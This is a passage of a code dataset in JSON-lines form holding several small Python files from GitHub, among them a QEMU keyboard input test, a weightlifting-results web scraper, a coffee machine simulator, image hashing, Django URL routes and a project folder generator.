column=5)\n","repo_name":"Pika-Codes/Unit1-Proj","sub_path":"Proto2.py","file_name":"Proto2.py","file_ext":"py","file_size_in_byte":4715,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"43240171889","text":"# Join Two Lists\r\n\r\nlist1 = [\"a\", \"b\", \"c\"]\r\nlist2 = [1, 2, 3]\r\n\r\nlist3 = list1 + list2 # Joins list1 and list2 two under list3\r\nprint(list3)\r\n\r\nfor x in list2: # all of the items in list2\r\n list1.append(x) # are appended at the end of list 1\r\nprint(list1) \r\n\r\nlist1.extend(list2) # add the items from list2 to list1\r\nprint(list1)","repo_name":"levislowe/Python_Practice","sub_path":"27JoinLists.py","file_name":"27JoinLists.py","file_ext":"py","file_size_in_byte":333,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"16039351970","text":"import json\nimport os\nimport time\nimport logging\n\nfrom virttest import error_context\nfrom virttest import utils_test\nfrom virttest import graphical_console\nfrom virttest import data_dir\nfrom provider import input_event_proxy\n\n\ndef get_keycode_cfg(filename):\n \"\"\"\n Get keyname to keycode cfg table.\n :param filename: filename that key to keycode file.\n \"\"\"\n keycode_cfg_path = os.path.join(data_dir.get_deps_dir(\"key_keycode\"), filename)\n print(keycode_cfg_path)\n with open(keycode_cfg_path) as f:\n return json.load(f)\n\n\n@error_context.context_aware\ndef key_tap_test(test, params, vm):\n \"\"\"\n Keyboard test. 
Support single key and combination key tests.\n\n    :param test: kvm test object\n    :param params: dictionary with the test parameters\n    :param vm: vm object\n    \"\"\"\n\n    def key_check(key):\n        \"\"\"\n        Check received key event match expected key event.\n        :param key: tested key name.\n        \"\"\"\n        events_queue = listener.events\n\n        if '-' in key:\n            key_lst = [key_check_cfg[k] for k in key.split('-')]\n        else:\n            key_lst = [key_check_cfg[key]]\n        key_num = len(key_lst)\n        key_event_lst = list()\n\n        while not events_queue.empty():\n            events = events_queue.get()\n            key_event_lst.append((events[\"keyCode\"], events[\"type\"]))\n\n        if len(key_event_lst) < 2 * key_num:\n            test.fail(\"Received key events %s were not enough\" % key_event_lst)\n\n        key_down_lst = list()\n        for k, v in key_event_lst[:-key_num]:\n            if v != 'KEYDOWN':\n                test.fail(\"Received key {0} event type {1} was not KEYDOWN\".format(k, v))\n            key_down_lst.append(k)\n\n        if len(key_down_lst) != key_num or set(key_down_lst) != set(key_lst):\n            test.fail(\"Key down event keycode error, received:{0},\"\n                      \"expect:{1}\".format(key_down_lst, key_lst))\n\n        key_up_lst = list()\n        for k, v in key_event_lst[-key_num:]:\n            if v != 'KEYUP':\n                test.fail(\"Received key {0} event type {1} was not KEYUP\".format(k, v))\n            key_up_lst.append(k)\n\n        if set(key_up_lst) != set(key_lst):\n            test.fail(\"Key up event keycode error, received:{0},\"\n                      \"expect:{1}\".format(key_up_lst, key_lst))\n\n    key_table_file = params.get('key_table_file')\n    key_check_cfg = get_keycode_cfg(key_table_file)\n    wait_time = float(params.get(\"wait_time\", 0.2))\n\n    error_context.context(\"Start event listener in guest\", logging.info)\n    listener = input_event_proxy.EventListener(vm)\n\n    console = graphical_console.GraphicalConsole(vm)\n    for key in key_check_cfg.keys():\n        error_context.context(\"Send %s key tap to guest\" % key, logging.info)\n        console.key_tap(key)\n        error_context.context(\"Check %s key tap event received \"\n                              \"correctly in guest\" % key, logging.info)\n        time.sleep(wait_time)\n        key_check(key)\n\n    listener.clear_events()\n    listener.cleanup()\n\n\n@error_context.context_aware\ndef run(test, params, env):\n    \"\"\"\n    Input keyboard test.\n\n    1) Log into the guest.\n    2) Check if the driver is installed and verified (only for win).\n    3) Send key and check if the correct key event can be received.\n\n    :param test: kvm test object\n    :param params: Dictionary with the test parameters\n    :param env: Dictionary with test environment.\n    \"\"\"\n    vm = env.get_vm(params[\"main_vm\"])\n    vm.verify_alive()\n    drivers = params.objects(\"driver_name\")\n\n    if params[\"os_type\"] == \"windows\":\n        session = vm.wait_for_login()\n\n        error_context.context(\"Check vioinput driver is running\", logging.info)\n        utils_test.qemu. 
windrv_verify_running(session, test, drivers[0])\n\n error_context.context(\"Enable all vioinput related driver verified\",\n logging.info)\n for driver in params.objects(\"driver_name\"):\n session = utils_test.qemu.setup_win_driver_verifier(session, driver, vm)\n session.close()\n\n error_context.context(\"Run keyboard testing\", logging.info)\n key_tap_test(test, params, vm)\n","repo_name":"SarahYu01/tp-qemu-2","sub_path":"qemu/tests/vioinput_keyboard.py","file_name":"vioinput_keyboard.py","file_ext":"py","file_size_in_byte":4167,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"41879701786","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\nimport cv2\n\n#打开图片\n# img = cv2.imread('./origin.jpg')\n# cv2.namedWindow('img')\n# cv2.imshow('img',img)\n# cv2.waitKey(0)\n# cv2.destroyAllWindows()\n\nimg1 = cv2.imread('./origin.jpg')\nimg2 = cv2.imread('./originCopy.jpg')\n\ntest1 = cv2.imread('./test1.jpg')\ntest2 = cv2.imread('./test2.jpg')\ntest3 = cv2.imread('./test3.jpg')\n\ncut = cv2.imread('./cut.jpg')\n\n#均值哈希算法\ndef aHash(img):\n #缩放为20*20\n img=cv2.resize(img,(20,20),interpolation=cv2.INTER_CUBIC)\n #转换为灰度图\n gray=cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n #s为像素和初值为0,hash_str为hash值初值为''\n s=0\n hash_str=''\n #遍历累加求像素和\n for i in range(20):\n for j in range(20):\n s=s+gray[i,j]\n #求平均灰度\n avg=s/400\n #灰度大于平均值为1相反为0生成图片的hash值\n for i in range(20):\n for j in range(20):\n if gray[i,j]>avg:\n hash_str=hash_str+'1'\n else:\n hash_str=hash_str+'0' \n return hash_str\n\n#Hash值对比\ndef cmpHash(hash1,hash2):\n n=0\n #hash长度不同则返回-1代表传参出错\n if len(hash1)!=len(hash2):\n return -1\n #遍历判断\n for i in range(len(hash1)):\n #不相等则n计数+1,n最终为相似度\n if hash1[i]!=hash2[i]:\n n=n+1\n return n\n\nprint(aHash(img1))\nprint(aHash(img2))\n\nprint(aHash(test1))\nprint(aHash(test2))\nprint(aHash(test3))\n\nprint(aHash(cut))\n\nprint(cmpHash(aHash(img1),aHash(img2)))\nprint(cmpHash(aHash(img1),aHash(cut)))\nprint(cmpHash(aHash(img1),aHash(test1)))","repo_name":"ZCreturn0/llk_support","sub_path":"same-picture.py","file_name":"same-picture.py","file_ext":"py","file_size_in_byte":1651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21198815010","text":"from django.urls import path\nfrom . 
import views\n\napp_name = 'leads'\n\nurlpatterns = [\n    path('',views.LeadListView.as_view(), name='lead-section'),\n    # path('',views.leads_list, name='lead-section'),\n    \n    path('create_lead/',views.LeadCreateView.as_view(), name='create'),\n    # path('create_lead/',views.lead_create, name='create'),\n    \n    path('<int:pk>/update/', views.LeadUpdateView.as_view(), name='update'),\n    # path('<int:pk>/update/', views.lead_update, name='update'),\n    \n    path('<int:pk>/', views.LeadDetailView.as_view(), name='lead-detail'),\n    # path('<int:pk>/',views.lead_detail, name='lead-detail'),\n    \n    path('delete/<int:pk>/', views.LeadDeleteView.as_view(), name='delete'),\n    # path('delete/<int:pk>/', views.lead_delete, name='delete'),\n]\n ","repo_name":"Great-special/testProjects","sub_path":"CRMSource/leads/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":784,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"6246081330","text":"#!/usr/bin/env python\n# coding: utf-8\n\n# In[ ]:\n\n\nimport re\nimport requests\nfrom bs4 import BeautifulSoup\nimport pandas as pd\nimport concurrent.futures\nimport os\nfrom glob import glob\n\n\n# In[ ]:\n\n\nyears_list = [1996 + x for x in range(24)]\n\nolympic_years_list = [1980 + x for x in range(0, 40, 4)]\n\ncountry_codes = pd.read_html(\"https://www.iban.com/country-codes\")[0]\n\nclass CheckFunctions():\n    \n    @staticmethod\n    def check_group(results_dataframe):\n#         try: \n        if not \"Group\\n\" in results_dataframe.iloc[0].values:\n            results_dataframe.insert(2, \"Group\", \"A\")\n            return results_dataframe\n        else: \n            return results_dataframe\n\n    @staticmethod\n    def check_bodyweight(results_dataframe):\n        if not \"Bodyweight\\n\" in results_dataframe.iloc[0].values:\n            if not \"Body weight\\n\" in results_dataframe.iloc[0].values:\n                if not \"Body Weight\\n\" in results_dataframe.iloc[0].values:\n                    results_dataframe.insert(3, \"Body Weight (kg)\", \"NaN\")\n                    return results_dataframe\n        else:\n            return results_dataframe\n\n    @staticmethod\n    def check_nation(results_dataframe):\n        if not \"Nation\\n\" in results_dataframe.iloc[0].values:\n            new_cols = results_dataframe[1].str.split(\"(\", 1, expand=True)\n            results_dataframe[1] = new_cols[0]\n            results_dataframe.insert(2, \"Nationality\", new_cols[1])\n            results_dataframe[\"Nationality\"] = results_dataframe[\"Nationality\"].str.strip(\")\")\n            return results_dataframe\n        else:\n            return results_dataframe\n    \n    @staticmethod\n    def check_max_lift(results_dataframe):\n        if not \"Result\\n\" in results_dataframe.iloc[1].values:\n            results_dataframe.insert(8, \"Max Snatch\", 0)\n            results_dataframe.insert(13, \"Max C/J\", 0)\n            return results_dataframe\n        else:\n            return results_dataframe\n\n    @staticmethod\n    def check_rank(results_dataframe):\n        if not \"Rank\\n\" in results_dataframe.iloc[1].values:\n            results_dataframe.insert(9, \"Snatch Rank\", 0)\n            results_dataframe.insert(14, \"C/J Rank\", 0)\n            return results_dataframe\n        else:\n            results_dataframe.rename({9: \"Snatch Rank\", 14: \"C/J Rank\"})\n            return results_dataframe\n    \nclass WikiParser():\n    \n    @staticmethod\n    def get_h1_text(website_url):\n        url = requests.get(website_url)\n        page = BeautifulSoup(url.text, 'lxml')\n        header_id = page.find(\"h1\", id=\"firstHeading\").get_text()\n        return header_id\n    \n    @staticmethod\n    # Create a function to grab all of the results urls from each weight class of the competition year\n    def process_urls(url):\n        website_url = requests.get(url)\n        page = BeautifulSoup(website_url.text, \"lxml\")\n        results_urls = []\n        for link in page.find_all(\"a\", 
attrs={\"href\": re.compile(f\"^{url[24:]}_\")}):\n results_urls.append(link.get('href'))\n return results_urls\n \n @staticmethod\n def iwf_competitions_to_dataframe(website_url, header_name):\n # parse html; find table; find table rows\n url = requests.get(website_url)\n page = BeautifulSoup(url.text, 'lxml')\n header_id = page.find(\"span\", id=header_name)\n wiki_table = header_id.parent.find_next_sibling(\"table\", class_=\"wikitable\")\n table_cells = wiki_table.find('td')\n table_rows = wiki_table.find_all(\"tr\")\n # Iterate through rows and load text into a list\n results_table = []\n for row in table_rows:\n table_tags = row.find_all([\"th\", \"td\"])\n td = list(item.text for item in table_tags)\n results_table.append(td)\n results_df = pd.DataFrame(results_table)\n return results_df\n \n @staticmethod\n def iwf_links(website_url, header_name, years_list):\n # parse html; find table; find table rows\n url = requests.get(website_url)\n page = BeautifulSoup(url.text, 'lxml')\n header_id = page.find(\"span\", id=header_name)\n wiki_table = header_id.parent.find_next_sibling(\"table\", class_=\"wikitable\")\n # Iterate through rows and load text into a list\n links_list = []\n for link in wiki_table.find_all(\"a\"):\n for year in years_list:\n if f\"{year}\" in link.get_text():\n links_list.append(link.get(\"href\"))\n return links_list\n \n @staticmethod\n def oly_links(website_url, div_id, years_list):\n # parse html; find table; find table rows\n url = requests.get(website_url)\n page = BeautifulSoup(url.text, 'lxml')\n page_details = page.find(\"div\", id=div_id)\n oly_years_table = page_details.find(\"table\", class_=\"infobox\")\n # Iterate through rows and load text into a list\n links_list = []\n for link in oly_years_table.find_all(\"a\"):\n for year in olympic_years_list:\n if f\"{year}\" in link.get_text():\n links_list.append(link.get(\"href\"))\n return links_list\n \n @staticmethod\n def results_to_dataframe(website_url, header_name):\n # parse html; find table; find table rows\n url = requests.get(website_url)\n page = BeautifulSoup(url.text, 'lxml')\n header_id = page.find(\"span\", id=header_name)\n wiki_table = header_id.parent.find_next_sibling(\"table\", class_=\"wikitable\")\n table_cells = wiki_table.find('td')\n table_rows = wiki_table.find_all(\"tr\")\n # Iterate through rows and load text into a list\n results_table = []\n for elem in table_rows:\n strikethrough = elem.find_all(\"s\")\n bold = elem.find_all(\"b\")\n for string in strikethrough:\n negative = \"\".join(f\"-{string.get_text()}\")\n string.replace_with(negative)\n for string in bold:\n non_bold = \"\".join(f\"{string.get_text()}\")\n string.replace_with(non_bold)\n for tag in table_rows:\n table_tags = tag.find_all([\"th\", \"td\"])\n td = []\n for text in table_tags:\n td.append(text.get_text())\n results_table.append(td)\n results_df = pd.DataFrame(results_table)\n return results_df\n \nclass ResultsCleanup():\n \n @staticmethod\n def column_row_cleanup(results_dataframe):\n CheckFunctions.check_group(results_dataframe)\n CheckFunctions.check_bodyweight(results_dataframe)\n CheckFunctions.check_nation(results_dataframe)\n CheckFunctions.check_max_lift(results_dataframe)\n CheckFunctions.check_rank(results_dataframe)\n column_names = (\n \"Comp Rank, Athlete Name, Nationality, Group, Body Weight (kg), \"\n \"Snatch 1 (kg), Snatch 2 (kg), Snatch 3 (kg), Max Snatch, Snatch Rank, \"\n \"C/J 1 (kg), C/J 2 (kg), C/J 3 (kg), Max C/J, C/J Rank, Total\"\n ).split(\", \")\n results_dataframe.columns = 
column_names\n results_dataframe.drop([0,1], inplace=True)\n results_dataframe.reset_index(inplace=True)\n results_dataframe.drop(\"index\", axis=1, inplace=True)\n # Change country name to country code for consistency\n CheckFunctions.change_nation_code(results_dataframe)\n return results_dataframe\n\n @staticmethod\n def check_float(string):\n try:\n float(string)\n return True\n except ValueError:\n return False\n \n @staticmethod\n def string_to_float(converted_list):\n for elem in converted_list:\n if ResultsCleanup.check_float(elem):\n rational = float(elem)\n index = converted_list.index(elem)\n converted_list.pop(index)\n converted_list.insert(index, rational)\n elif ResultsCleanup.check_float(elem) == False:\n index = converted_list.index(elem)\n converted_list.pop(index)\n converted_list.insert(index, 0)\n else:\n print(\"error\")\n return converted_list\n \n @staticmethod\n def lift_rankings(results_dataframe, lift_col_names, max_lift, lift_rank):\n \"\"\"Note: lift_col_names = [\"Snatch 1 (kg)\", \"Snatch 2 (kg)\", \"Snatch 3 (kg)\"] \n or [\"C/J 1 (kg)\", \"C/J 2 (kg)\", \"C/J 3 (kg)\"]\n Note: max_lift = 'Max Snatch' or 'Max C/J' \n Note: lift_rank = 'Snatch Rank' or 'C/J Rank'\"\"\"\n temp_list = results_dataframe[lift_col_names].values.tolist()\n max_weight = []\n for elem in temp_list:\n ResultsCleanup.string_to_float(elem)\n results_dataframe[lift_col_names] = temp_list\n for row in temp_list:\n row.sort()\n for row in range(len(temp_list)):\n max_weight.append(temp_list[row][-1])\n # Sort the indices of the max lifts to get comp rank (overall place)\n max_lift_rankings = list(sorted(max_weight, reverse=True).index(num) + 1 for num in max_weight)\n results_dataframe[max_lift] = max_weight\n results_dataframe[lift_rank] = max_lift_rankings\n return results_dataframe\n\n @staticmethod\n def data_cleanup(results_dataframe):\n podium = [1, 2, 3]\n for i in range(len(podium)):\n results_dataframe[\"Comp Rank\"][i] = podium[i]\n results_dataframe.replace(\"\\n\", \"\", regex=True, inplace = True)\n results_dataframe.replace(\"\\xa0\", \"\", regex=True, inplace=True)\n results_dataframe.replace(\"None\", \"\", regex=True, inplace=True)\n results_dataframe.fillna(\"NaN\", inplace = True)\n # Some cells have \"OR\" or \"=OR\" to indicate Olympic Record.\n # The following .split() func delete any data after the digit\n results_dataframe[\"Snatch 1 (kg)\"] = results_dataframe[\"Snatch 1 (kg)\"].str.split().str[0]\n results_dataframe[\"Snatch 2 (kg)\"] = results_dataframe[\"Snatch 2 (kg)\"].str.split().str[0]\n results_dataframe[\"Snatch 3 (kg)\"] = results_dataframe[\"Snatch 3 (kg)\"].str.split().str[0]\n results_dataframe[\"C/J 1 (kg)\"] = results_dataframe[\"C/J 1 (kg)\"].str.split().str[0]\n results_dataframe[\"C/J 2 (kg)\"] = results_dataframe[\"C/J 2 (kg)\"].str.split().str[0]\n results_dataframe[\"C/J 3 (kg)\"] = results_dataframe[\"C/J 3 (kg)\"].str.split().str[0]\n results_dataframe[\"Total\"] = results_dataframe[\"Total\"].astype(str).str.split().str[0]\n results_dataframe[\"Body Weight (kg)\"] = ResultsCleanup.string_to_float(results_dataframe[\"Body Weight (kg)\"].values.tolist())\n results_dataframe[\"Comp Rank\"] = ResultsCleanup.string_to_float(results_dataframe[\"Comp Rank\"].values.tolist())\n results_dataframe[\"Total\"] = ResultsCleanup.string_to_float(results_dataframe[\"Total\"].values.tolist())\n return results_dataframe\n\nclass datatable_cleanup():\n \n @staticmethod\n def insert_year(website_url):\n if website_url[30:43] == \"Weightlifting\":\n year = 
website_url[51:55]\n return year\n else:\n year = website_url[30:34]\n return year \n \n @staticmethod\n def insert_gender(website_url):\n if website_url[79:82] == \"Men\":\n gender = \"M\"\n return gender\n elif website_url[79:84] == \"Women\":\n gender = \"W\"\n return gender\n elif website_url[82:85] == \"Men\":\n gender = \"M\"\n return gender\n elif website_url[82:87] == \"Women\":\n gender = \"W\"\n return gender\n \n @staticmethod\n def country_code_cleanup(dataframe):\n iso_country_codes = pd.read_csv(\"country-codes-alpha-3-only.csv\")\n iso_country_codes.drop(\"Unnamed: 0\", axis=1, inplace=True)\n ioc_country_codes = pd.read_csv(\"country-codes-ioc.csv\")\n ioc_country_codes.drop(\"Unnamed: 0\", axis=1, inplace=True)\n for country in dataframe[\"Nationality\"].values.tolist():\n if country in iso_country_codes[\"Country\"].values.tolist():\n iso_dataframe_index = dataframe[\"Nationality\"].values.tolist().index(country)\n iso_code_index = iso_country_codes[\"Country\"].values.tolist().index(country)\n iso_code = iso_country_codes[\"Alpha-3 code\"][iso_code_index]\n dataframe[\"Nationality\"][iso_dataframe_index] = iso_code\n elif country in ioc_country_codes[\"Country\"].values.tolist():\n ioc_dataframe_index = dataframe[\"Nationality\"].values.tolist().index(country)\n ioc_code_index = ioc_country_codes[\"Country\"].values.tolist().index(country)\n ioc_code = ioc_country_codes[\"IOC code\"][ioc_code_index]\n dataframe[\"Nationality\"][ioc_dataframe_index] = ioc_code\n return dataframe\n \n @staticmethod\n def insert_event(website_url):\n if website_url[30:43] == \"Weightlifting\":\n event = \"oly\"\n return event\n else:\n event = \"iwf\"\n return event\n \n @staticmethod\n def results_table(website_url):\n year = datatable_cleanup.insert_year(website_url)\n gender = datatable_cleanup.insert_gender(website_url)\n event = datatable_cleanup.insert_event(website_url)\n url_header = WikiParser.get_h1_text(website_url)\n header_name = \"Results\"\n snatch_cols = [\"Snatch 1 (kg)\", \"Snatch 2 (kg)\", \"Snatch 3 (kg)\"] \n clean_cols = [\"C/J 1 (kg)\", \"C/J 2 (kg)\", \"C/J 3 (kg)\"]\n df = WikiParser.results_to_dataframe(website_url, header_name)\n ResultsCleanup.column_row_cleanup(df)\n ResultsCleanup.data_cleanup(df)\n ResultsCleanup.lift_rankings(df, snatch_cols, \"Max Snatch\", \"Snatch Rank\")\n ResultsCleanup.lift_rankings(df, clean_cols, \"Max C/J\", \"C/J Rank\")\n df.insert(0,\"Year\", year)\n df.insert(1, \"Event\", event)\n df.insert(2, \"Gender\", gender)\n file_name = url_header + \".csv\"\n df.to_csv(file_name)\n return file_name\n \n @staticmethod\n def concat_csv(file_name):\n file_pattern = \".csv\"\n file_rename = file_name + file_pattern\n list_of_files = [file for file in glob(\"*{}\".format(file_pattern))]\n # Combine all files in the list into a dataframe\n dataframe_csv = pd.concat([pd.read_csv(file, engine=\"python\") for file in list_of_files])\n # Export the dataframe to csv\n dataframe_csv.to_csv(file_rename, index=False, encoding='utf-8')\n list_of_files\n return list_of_files\n\n\n# In[5]:\n\n\nget_ipython().system('jupyter nbconvert --to script webscraping_functions.ipynb')\n\n","repo_name":"jemvega/olympic-iwf-weightlifting-competition-results","sub_path":"webscraping_functions.py","file_name":"webscraping_functions.py","file_ext":"py","file_size_in_byte":14750,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"13695616688","text":"#!/bin/python3\n\nimport math\nimport os\nimport 
random\nimport re\nimport sys\n\n\n\ndef pickingNumbers(a):\n    n=len(a)\n    a1=sorted(a)\n    l=[]\n    for i in range(0,n):\n        count=1\n        for j in range(i+1,n):\n            if abs(a1[i]-a1[j])<=1:\n                count=count+1\n        l.append(count)\n    return max(l)\n\n\nif __name__ == '__main__':\n    fptr = open(os.environ['OUTPUT_PATH'], 'w')\n\n    n = int(input().strip())\n\n    a = list(map(int, input().rstrip().split()))\n\n    result = pickingNumbers(a)\n\n    fptr.write(str(result) + '\\n')\n\n    fptr.close()\n","repo_name":"vuggesaikalyan/Hackerank-Algorithms-python","sub_path":"picking numbers.py","file_name":"picking numbers.py","file_ext":"py","file_size_in_byte":548,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"69940891002","text":"from sys import exit\n\nMENU = {\n    \"espresso\": {\n        \"ingredients\": {\n            \"water\": 50,\n            \"coffee\": 18,\n        },\n        \"cost\": 1.5,\n    },\n    \"latte\": {\n        \"ingredients\": {\n            \"water\": 200,\n            \"milk\": 150,\n            \"coffee\": 24,\n        },\n        \"cost\": 2.5,\n    },\n    \"cappuccino\": {\n        \"ingredients\": {\n            \"water\": 250,\n            \"milk\": 100,\n            \"coffee\": 24,\n        },\n        \"cost\": 3.0,\n    }\n}\n\nresources = {\n    \"water\": 300,\n    \"milk\": 200,\n    \"coffee\": 100,\n}\n\nmoney = 0\ntotal = 0\ncoins = {\n    \"quarters\": 0.25,\n    \"dimes\": 0.10,\n    \"nickels\": 0.05,\n    \"pennies\": 0.01\n}\n\n\ndef required(choice):\n    \"\"\"This checks if the resources available cover the requested coffee. Returns True if resources sufficient, else\n    returns False \"\"\"\n    for key in MENU[choice][\"ingredients\"]:\n        if resources[key] < MENU[choice][\"ingredients\"][key]:\n            print(f\"Sorry there isn't enough {key}\")\n            return False\n    return True\n\n\ndef coffee():\n    \"\"\"the main function used to start the coffee machine process\"\"\"\n    global total\n    global money\n    choice = input(\"What would you like? (espresso/latte/cappuccino): \").lower()\n    if choice == \"random\":\n        for key in resources:\n            print(f\"{key} : {resources[key]}\")\n        print(f\"money : {money}\")\n        coffee()\n    elif choice == \"off\":\n        exit()\n    elif choice == \"espresso\" or choice == \"latte\" or choice == \"cappuccino\":\n        if required(choice):\n            print(\"Please insert coins\")\n            for key in coins:\n                total += int(input(f\"How many {key}? \")) * coins[key]\n            change = total - MENU[choice][\"cost\"]\n            money += MENU[choice][\"cost\"]\n            total = 0\n            if change < 0:\n                print(\"Sorry that's not enough money. 
Money refunded\")\n coffee()\n else:\n for key in MENU[choice][\"ingredients\"]:\n resources[key] -= MENU[choice][\"ingredients\"][key]\n print(f\"Here is ${round(change, 1)} in change\")\n print(f\"Here is your {choice} ☕ Enjoy!\")\n coffee()\n else:\n coffee()\n\n\ncoffee()\n","repo_name":"TMayowa/100-days-of-code","sub_path":"Day 15 - Coffee machine/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":2251,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"23509511476","text":"\"\"\"\r\n最邻近插值算法测试用例\r\nNearest_Interp_Example\r\ndata:2023.9.7\r\n\"\"\"\r\nimport cv2\r\nimport numpy as np\r\nfrom Nearest_Interp_2 import nearest_interp\r\n\r\nheight = 400\r\nwidth = 400\r\nout_dim = (height,width)\r\nimg = cv2.imread(\"D:\\\\subject_learning\\\\cv_learn\\\\project\\\\lenna.jpg\")\r\nempty_img = nearest_interp(img, out_dim)\r\n# empty_img = cv2.resize(img, (height, width),interpolation=cv2.INTER_NEAREST) # 使用resize()函数可替代,interpolation选择插值的方式\r\nprint('原图尺寸:', img.shape)\r\nprint(empty_img.shape)\r\ncv2.imshow('img', img)\r\ncv2.imshow('empty_img', empty_img)\r\ncv2.waitKey(0) # 在程序中添加一个等待键盘输入的循环,等待用户按下任意键后关闭图像窗口;不加会瞬间自动关闭打开的图像\r\n","repo_name":"OMG1-1/badou-ai-special-2023","sub_path":"252--尹业龙/week_2_Digital_image/Nearest_Interp_Example.py","file_name":"Nearest_Interp_Example.py","file_ext":"py","file_size_in_byte":766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"40"} +{"seq_id":"70854646522","text":"# -*- coding: utf-8 -*-\n'''\n@Time : 2021/3/1 19:33\n@Author : daluzi\n@File : 06.py\n'''\n\n# 剑指 Offer 06. 从尾到头打印链表\n# 输入一个链表的头节点,从尾到头反过来返回每个节点的值(用数组返回)。\n\nclass ListNode:\n def __init__(self, x):\n self.val = x\n self.next = None\nclass Solution:\n def reversePrint(self, head: ListNode) -> List[int]:\n # 递归\n # return self.reversePrint(head.next) + [head.val] if head else []\n\n # 辅助栈\n auxiliaryArray = []\n\n while head:\n auxiliaryArray.append(head.val)\n head = head.next\n\n return auxiliaryArray[::-1]","repo_name":"daluzi/CodeInterview","sub_path":"06.py","file_name":"06.py","file_ext":"py","file_size_in_byte":677,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"24067059634","text":"\"\"\"\nНаписать скрипт, создающий стартер (заготовку) для проекта со следующей структурой папок:\n|--my_project\n |--settings\n |--mainapp\n |--adminapp\n |--authapp\nПримечание: подумайте о ситуации, когда некоторые папки уже есть на диске (как быть?); как\nлучше хранить конфигурацию этого стартера, чтобы в будущем можно было менять имена\nпапок под конкретный проект; можно ли будет при этом расширять конфигурацию и хранить\nданные о вложенных папках и файлах (добавлять детали)?\n\"\"\"\nimport os\n\ndef make_dir_from_dict(folder_dict, path):\n for element, below_element in folder_dict.items():\n #print(f'ключ: {element}, значение: {below_element}')\n if isinstance(element, str):\n os.makedirs(os.path.join(path, element), exist_ok=True)\n if isinstance(below_element, list):\n #print(f'Значение - список: {below_element}')\n for name_below_element in below_element:\n if isinstance(name_below_element, dict):\n make_dir_from_dict(name_below_element, os.path.join(path, element))\n elif name_below_element.find('.') != -1:\n f = open(os.path.join(path, element, name_below_element), 'w')\n f.close()\n else:\n os.makedirs(os.path.join(path, element, name_below_element), exist_ok=True)\n elif isinstance(below_element, dict):\n for key in 
below_element:\n print('Do somthing')\n make_dir_from_dict(key, os.path.join(path, element))\n elif isinstance(below_element, str):\n #print(f'Below_element - str: {below_element}')\n if below_element.find('.') != -1:\n f = open(os.path.join(path, element, below_element), 'w')\n f.close()\n else:\n os.makedirs(os.path.join(path, element, below_element), exist_ok=True)\n return\n\nfolder_dict = {'my_project': ['settings', 'tst.py','mainapp', 'adminapp', 'authapp'],\n 'test_file':\n [\n {'super_test': ['test_iq', 'test_fps', 'test.py'],\n 'easy_test':\n [\n {'firts': ['sum_to_10', 'sum_to_100', 'sum.html'],\n 'second':\n [\n {'second_one': ['comparison', 'comp.css'],\n 'second_two': 'brrr.zip',\n 'secon_three': ['free_folder', 'free.file']\n }\n ]\n }\n ],\n 'hard_test': ['fourier_series', 'find_genius', 'logical', 'lg.jpg']\n }\n ]\n }\nif __name__ == \"__main__\":\n path = os.getcwd()\n make_dir_from_dict(folder_dict, path)\n\n'''\nввёл свой словарь, что бы работало для папок и файлов. пример, разобранного задания на вебинаре очнь помог,\nно хотелось это же реализовать через dict.items(). Из-за появления нескольких уровней вложенностей запустался в if - \n- elif. Срипт протестировал на разных словарях, пытаясь добиться универсальности. Можно задавать любую нужную иеархию.\nКак я понял ограничений во вложенности нет.\n'''","repo_name":"Gefahr87/Tatarenko_Vitaly_dz","sub_path":"Python/Task_7/Task_7_1.py","file_name":"Task_7_1.py","file_ext":"py","file_size_in_byte":4055,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"21491979277","text":"from . import views\nfrom django.urls import path\n\nurlpatterns = [\n path('',views.home,name='home'),\n path('register',views.register,name='register'),\n path('login',views.login,name='login'),\n path('logout',views.logout,name='logout'),\n\n path('add/', views.person_create_view, name='person_add'),\n path('/', views.person_update_view, name='person_change'),\n path('newform', views.newform, name='newform'),\n path('form', views.form, name='form'),\n\n\n path('ajax/load-cities/', views.load_cities, name='ajax_load_cities'),\n\n]\n\n","repo_name":"AnjalyL/AnjalyFinal","sub_path":"lavsproject/credentials/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":558,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"40"} +{"seq_id":"24080856717","text":"import networkx as nx\nimport pandas as pd\nimport torch\ndata_df = pd.read_csv(\"C:/Users/85433/Desktop/demo/datadata/esca_log.csv\")\ngene_data = data_df.iloc[2:, 0].tolist()\nprint(gene_data)\npathway_file = 'gene_relationship_ke.csv'\npathway_df = pd.read_csv(pathway_file, header=None)\npathway_data = pathway_df.values.tolist()\ngene_id_map = {gene: idx for idx, gene in enumerate(gene_data)}\nG = nx.Graph()\nfor pathway in pathway_data:\n source = pathway[0]\n target = pathway[1]\n if source in gene_data and target in gene_data:\n G.add_edge(gene_id_map[source], gene_id_map[target])\n\nedge_index = torch.tensor(list(G.edges())).t().contiguous()\nprint(edge_index)\nedge_df = pd.DataFrame(edge_index.numpy().transpose())\nedge_file = 'edge_index.csv'\nedge_df.to_csv(edge_file,header=False, index=False)\n","repo_name":"starlightyouth/GDEC","sub_path":"channel.py","file_name":"channel.py","file_ext":"py","file_size_in_byte":808,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"40"} +{"seq_id":"73447959481","text":"#!/usr/bin/env python\r\n# -*- 
